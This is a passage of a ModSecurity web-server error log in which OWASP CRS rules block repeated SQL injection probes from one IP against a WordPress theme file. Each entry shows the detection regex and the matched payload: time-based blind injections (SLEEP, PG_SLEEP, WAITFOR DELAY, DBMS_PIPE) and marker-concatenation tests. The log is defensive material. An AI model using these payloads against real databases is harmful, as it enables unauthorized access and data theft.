"OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRPUCh5vf5PuAcijj8QAAABc"] [Fri Jul 12 08:36:04.441630 2024] [:error] [pid 29519:tid 139783907645184] [client 141.98.81.44:37974] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: (SELECT CONCAT(0x7171626a71,(SELECT (ELT(5165=5165,1))),0x7170626b71))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRDEhNOprNgeRyDcP5wAAAIM"] [Fri Jul 12 08:36:04.899145 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:37976] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: (SELECT (CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (5709=5709) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRBoAeojmxWlFps7wkgAAANQ"] [Fri Jul 12 08:36:05.169660 2024] [:error] [pid 30143:tid 139783907645184] [client 141.98.81.44:37978] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:ver: (SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5334=5334) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRRoAeojmxWlFps7wkwAAAMM"] [Fri Jul 12 08:36:05.426111 2024] [:error] [pid 29519:tid 139783899252480] [client 141.98.81.44:37980] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRTEhNOprNgeRyDcP6AAAAIQ"] [Fri Jul 12 08:36:05.668073 2024] [:error] [pid 30143:tid 139783795894016] [client 141.98.81.44:37982] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRRoAeojmxWlFps7wlAAAAMg"] [Fri Jul 12 08:36:05.935173 2024] [:error] [pid 29518:tid 139783711966976] [client 141.98.81.44:37984] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRag1rY6w-xq1eShSUQAAAFI"] [Fri Jul 12 08:36:06.203540 2024] [:error] [pid 29518:tid 139783703574272] [client 141.98.81.44:37986] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRqg1rY6w-xq1eShSUgAAAFM"] [Fri Jul 12 08:36:06.490496 2024] [:error] [pid 29517:tid 139783686788864] [client 141.98.81.44:37988] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRvUCh5vf5PuAcijj8gAAABU"] [Fri Jul 12 08:36:06.863212 2024] [:error] [pid 30143:tid 139783787501312] [client 141.98.81.44:37990] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRhoAeojmxWlFps7wlQAAAMk"] [Fri Jul 12 08:36:07.122269 2024] [:error] [pid 29517:tid 139783899252480] [client 141.98.81.44:37992] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExR_UCh5vf5PuAcijj8wAAAAQ"] [Fri Jul 12 08:36:07.405877 2024] [:error] [pid 29518:tid 139783678396160] [client 141.98.81.44:37994] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExR6g1rY6w-xq1eShSUwAAAFY"] [Fri Jul 12 08:36:07.666856 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:37996] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRxoAeojmxWlFps7wlgAAAMU"] [Fri Jul 12 08:36:07.951500 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:37998] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExRxoAeojmxWlFps7wlwAAAMw"] [Fri Jul 12 08:36:08.282350 2024] [:error] [pid 30143:tid 139783770715904] [client 141.98.81.44:38000] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSBoAeojmxWlFps7wmAAAAMs"] [Fri Jul 12 08:36:08.590708 2024] [:error] [pid 30143:tid 139783728752384] [client 141.98.81.44:38002] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSBoAeojmxWlFps7wmQAAANA"] [Fri Jul 12 08:36:08.850990 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:38004] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSBoAeojmxWlFps7wmgAAAMc"] [Fri Jul 12 08:36:09.117230 2024] [:error] [pid 30143:tid 139783779108608] [client 141.98.81.44:38006] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSRoAeojmxWlFps7wmwAAAMo"] [Fri Jul 12 08:36:09.450687 2024] [:error] [pid 30143:tid 139783753930496] [client 141.98.81.44:38008] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSRoAeojmxWlFps7wnAAAAM0"] [Fri Jul 12 08:36:09.796931 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38010] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(111)||CHR(120)||CHR(118),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSRoAeojmxWlFps7wnQAAANE"] [Fri Jul 12 08:36:10.086340 2024] [:error] [pid 29517:tid 139783882467072] [client 141.98.81.44:38012] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(111)||CHR(120)||CHR(118),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSvUCh5vf5PuAcijj9AAAAAY"] [Fri Jul 12 08:36:10.398386 2024] [:error] [pid 29519:tid 139783916037888] [client 141.98.81.44:38014] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(111)||CHR(120)||CHR(118),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExSjEhNOprNgeRyDcP6QAAAII"] [Fri Jul 12 08:36:10.650068 2024] [:error] [pid 29518:tid 139783661610752] [client 141.98.81.44:38016] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match 